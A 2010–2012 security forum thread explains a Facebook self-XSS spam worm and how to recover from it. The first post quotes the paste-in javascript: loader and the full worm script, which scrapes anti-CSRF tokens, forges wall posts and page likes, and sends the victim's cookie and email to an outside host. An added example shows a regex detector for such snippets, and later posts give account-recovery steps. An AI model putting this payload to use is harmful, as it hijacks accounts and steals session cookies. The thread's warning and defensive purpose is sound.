Offline Dr-Hack  
#1 Posted : Sunday, November 28, 2010 8:33:21 PM(UTC)
Dr-Hack


Rank: Administrator
Reputation:
Medals: Hackology Founder: This medal is earned by the Founders of Hackogy

Joined: 1/15/2005(UTC)
Posts: 1,318

Thanks: 22 times
Was thanked: 73 time(s) in 57 post(s)
EDIT: Feb 2012 - People are still being infected with such techniques; please read my post #11 on how to solve this issue ...

Facebook SPAM


You get a wall post from one of your friends saying some revolving image or new theme thing is out; view the link to enjoy it.

You open that site ...
The site asks you to copy some JavaScript code like ...
Code:
javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)

and when you post it in your Facebook account address bar ...
that's it, you start spamming .. and the fire keeps increasing ..

Some of the domains you should not visit if you see them in a post:


New domains keep coming ....


HOW TO STOP IT?
To stop it spamming to your wall, simply re-generate your mobile email unique address at http://www.facebook.com/mobile/, clean out your cookies and don't be copy/pasting JavaScript into your browser again!

UPDATE: Also remove the application which you allowed by mistake, and view the YouTube video here,
which I have made so you can easily understand what I mean by "Re-generate your mobile email unique address"



The script which runs inside the JS (which is mostly majic.js or the index.php file) is:
Code:
// script name : whitebeard
// author : orkut.com/Community.aspx?cmm=43558952
txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";
txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

with(x = new XMLHttpRequest())
open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";

with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);


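Added example, not part of Dr-Hack's post and not code from the spam campaign: a static triage, in JavaScript, of the two artefacts post #1 describes, the address-bar `javascript:` loader and the script it pulls in. The rule names, the `triage` function, the sample strings and the `cdn.example.invalid` host are all constructed for illustration; the text is only pattern-matched, never executed.

```javascript
// Rules mirror the behaviours visible in the loader and in the payload script above.
const RULES = [
  { id: "js-uri",        re: /^\s*javascript\s*:/i },                          // runs in the open page's origin
  { id: "script-inject", re: /createElement\(\s*["']script["']\s*\)/i },       // builds a <script> element
  { id: "remote-src",    re: /\.?src\s*=\s*["'](?:https?:)?\/\/([^\/"']+)/i }, // code fetched from another host
  { id: "csrf-token",    re: /fb_dtsg|post_form_id/ },                         // scrapes the anti-CSRF form tokens
  { id: "cookie-exfil",  re: /["'][^"']*[?&]\w+=["']\s*\+\s*document\.cookie/ }, // cookie appended to a URL
  { id: "forged-post",   re: /open\(\s*["']POST["']\s*,\s*["']\/ajax\//i },    // state-changing request as the user
];

function triage(text) {
  const hits = RULES.filter(r => r.re.test(text)).map(r => r.id);
  const host = (text.match(RULES[2].re) || [])[1] || null;
  const has = id => hits.includes(id);
  let verdict = "clean";
  // Loader: a javascript: URI whose only job is to pull in a remote script.
  if (has("js-uri") && has("script-inject") && has("remote-src")) verdict = "self-xss-loader";
  // Payload: reads the form tokens, then posts as the user or leaks the session cookie.
  else if (has("csrf-token") && (has("forged-post") || has("cookie-exfil"))) verdict = "worm-payload";
  else if (hits.length) verdict = "suspicious";
  return { verdict, host, hits };
}

// Constructed samples with the same shape as the snippets in the post.
const LOADER = 'javascript:(a = (b = document).createElement("script")).src = "//cdn.example.invalid/x.js?show", b.body.appendChild(a); void(0)';
const PAYLOAD = [
  'dt = z.match(/name="fb_dtsg" value="([\\d\\w-_]+)"/i)[1];',
  'with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),',
  'send("status=" + txt + "&fb_dtsg=" + dt);',
  's.src = "http://cdn.example.invalid/x.js?q=" + uid + "&c=" + document.cookie;',
].join("\n");
const BENIGN = "Check out my holiday photos at https://photos.example.invalid/album/1";

for (const [name, sample] of Object.entries({ LOADER, PAYLOAD, BENIGN })) {
  console.log(name, JSON.stringify(triage(sample)));
}
```

Pattern rules like these only catch unobfuscated samples; they are useful for sorting reported wall posts and pasted snippets, not as a guarantee that unmatched text is safe.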
Offline Dr-Hack  
#2 Posted : Sunday, November 28, 2010 10:54:07 PM(UTC)
Great, now we have such applications in Facebook.

One application which is just popping up is Profile Privacy v1.2 ... so please remember this is a FAKE APPLICATION and uses such comments on other users' walls:

Quote:
OMG OMG OMG... I cant believe this actually works! Now you really can see who viewed your profile! on http://bit.ly/9rVvrN


This app already has 300 users who have liked this App, don't so this fire will also spread like hell ...

and user visits doesn't work in Facebook to date.
Offline Hackills  
#3 Posted : Monday, November 29, 2010 6:10:48 PM(UTC)
Hackills


Rank: Hackology Applicant
Reputation:
Joined: 11/29/2010(UTC)
Posts: 1

Informative! Thanks for sharing Smile
Offline Dr-Hack  
#4 Posted : Monday, November 29, 2010 9:03:07 PM(UTC)
Hackills wrote:
Informative! Thanks for sharing Smile


That's what we're here for Cool

Making you do >:eangry
Offline Dr-Hack  
#5 Posted : Saturday, December 04, 2010 5:20:50 PM(UTC)
Updated post with a YouTube video for easy reference
Offline deatheater  
#6 Posted : Monday, December 06, 2010 1:20:01 PM(UTC)
deatheater


Rank: Lieutenant Wardriving
Reputation:
Joined: 5/2/2006(UTC)
Posts: 68

sup dr hack.

do u still remember me?

anyway
Code:
// author : orkut.com/Community.aspx?cmm=43558952


shhh...!!!! Evilthreat
Offline Dr-Hack  
#7 Posted : Monday, December 06, 2010 3:49:08 PM(UTC)
deatheater wrote:
sup dr hack.

do u still remember me?

anyway
Code:
// author : orkut.com/Community.aspx?cmm=43558952


shhh...!!!! Evilthreat


Yes, still remember you .. you don't come here, doesn't mean I'll forget tongue :p

lolz, yeah OUG comeback eh, but losing track of OUG now.
Getting old I guess

Nice to see you again ..

Take care
Offline Dr-Hack  
#8 Posted : Tuesday, December 13, 2011 4:46:31 AM(UTC)

So now we have another Facebook spam showing various links to videos, and that's the game; the concept is the same, just a new makeover..

But this time I will not go into details of anything .. reason? .. everyone is not keen to know the details. I will only share all-round steps to keep you out of such issues every time they occur.

11 Steps to Protect your Account from All sorts of Spamming.

1. Be Sensible.        Well, that's the most important thing: be sensible before clicking here and there ... this will save you from all the mess .. that's what I do. ...

2. Password Change        If you fell victim to a phishing scheme or another hack attack, it's likely that someone else has obtained your password and is using it to access your account. You'll need to change your login credentials ASAP. Visit Facebook's Account Settings to do this. Remember, don't reuse passwords on different accounts and the more complex the password, the safer you'll be.

3. Identity Verify     If you believe someone has gained access to your Facebook profile and is posting unauthorized content in your name, Facebook's Roadblock tool can help verify your identity and secure your account against the spammer.

4. Login Approvals    One of Facebook's new security features will implement a two-step login process the first time your account is accessed from an unfamiliar device. If you enable this feature, Facebook will send a verification text to your mobile device before allowing access from the new location. You can save or block the new device via your handset. If a foreign device fails to log in, Facebook will notify you when you next log in from one of your approved devices and will give you the option of resetting your password if you suspect foul play.

5. Remove Dirty Apps     When you approve a normal app, you "allow" the app access to your profile, trusting that the developers will post only updates about your in-app activities. However, spammers will use this open door to take over your profile. If you fell for a rogue app and mistakenly clicked "Allow," or if you notice excessive activity on your account, you should edit your list of apps and remove any suspicious ones. To do this, open the drop-down box under your Account tab, click "Privacy Settings" and find the "Apps and Websites" settings management tool (at the bottom of the page). This tool will help you manage your apps and the kind of information they can access. Your Apps Page lets you turn off all platform apps or remove/edit each app individually. It's a good idea to use this tool every now and again, since apps tend to pile up over time.

6. Delete Spam    As soon as you can, delete spammy posts from your wall and Facebook inbox. The fewer there are, the less likely you or your friends will be to click on them.

7. Like the Likable     If you were tricked into "Liking" a scam, you'll need to edit your interests on your profile and remove any links to spam sites you may have acquired.

8. Inform Facebook   If you suspect your account has been compromised, you can alert Facebook through several channels. To report privacy breaches, you can direct reports to [email protected]. If a scammer gained access to your account password via phishing attack, you can fill out Facebook's phishing report. Facebook also provides a separate form for reporting a malicious link or website

9. Scan the Machine     Facebook recommends that you scan your computer hard drive for malicious software that could potentially tap into your profile again. If you don't have an antivirus app, Facebook suggests using a free trial of McAfee.

10. Terminate Session    If you've entered a line of malicious code into your browser and believe that someone has taken control of your profile and is in the process of spamming your friends, log out of Facebook to stop the attack. One of Facebook's new security features may also notify you of suspicious activity on your account, such as excessive "Likes" or posts. 

11. Be Informed    You can Keep yourself abreast by staying connected with Hackology via various methods .. You can Join our Facebook Group( or Page?), Follow us on Twitter or be at the Blog and during issues post in this Forum ..

Offline kool  
#9 Posted : Friday, December 30, 2011 4:09:05 PM(UTC)
kool


Rank: Colonel Intelligence
Reputation:
Joined: 12/4/2010(UTC)
Posts: 103

Thanks: 13 times
Was thanked: 10 time(s) in 8 post(s)
nicee ... i like the first point "be sensible" tongue :p
Offline Dr-Hack  
#10 Posted : Tuesday, January 31, 2012 7:03:42 PM(UTC)
This thing is still not down, it's still running Sad .. when will this end .. it's a MESS
Offline Dr-Hack  
#11 Posted : Sunday, February 12, 2012 2:48:48 PM(UTC)
The virus thing is back again, with objectionable videos getting posted onto users' walls, and it tags all the friends of that user, so let me share another simple method to cure it. The above protection steps still hold valid..
This technique was shared by Mdnurhfz on How to Remove The Facebook Spam Virus of my Channel.

 

1) Go to 'Account Settings'.

2) Click on 'Security'.

3) Then look at the bottom there is this 'Deactivate your account' typed. Click on that.

4) It will bring you to a new page. Then, you'll see 'Reason for leaving'. So pick this 'I got hacked'.

5) A yellow box will appear saying 'Secure your account here.'

6) Click on 'here' then follow the instructions.

7) After that, thank God Smile


Or you can simply open Http://Facebook.com/Hacked and follow the Instructions to secure your account
 

thanks 3 users thanked Dr-Hack for this useful post.
Offline wiki117  
#12 Posted : Monday, February 13, 2012 3:36:10 PM(UTC)
wiki117


Rank: Hackology Applicant
Reputation:
Joined: 2/13/2012(UTC)
Posts: 1

Thanks: 1 times
Originally Posted by: Dr-Hack Go to Quoted Post
The virus thing is back again, with objectionable videos getting posted onto users' walls, and it tags all the friends of that user, so let me share another simple method to cure it. The above protection steps still hold valid..
This technique was shared by Mdnurhfz on How to Remove The Facebook Spam Virus of my Channel.

 

1) Go to 'Account Settings'.

2) Click on 'Security'.

3) Then look at the bottom there is this 'Deactivate your account' typed. Click on that.

4) It will bring you to a new page. Then, you'll see 'Reason for leaving'. So pick this 'I got hacked'.

5) A yellow box will appear saying 'Secure your account here.'

6) Click on 'here' then follow the instructions.

7) After that, thank God Smile


Or you can simply open Http://Facebook.com/Hacked and follow the Instructions to secure your account
 



IT REALLY WORKS 
Offline Niazi  
#13 Posted : Tuesday, February 21, 2012 11:05:15 AM(UTC)
Niazi


Rank: Hackology Applicant
Reputation:
Joined: 2/19/2011(UTC)
Posts: 2

I stand much learned O dear DrHack.

 

Thanks for the wonderful advice. Good Post

 

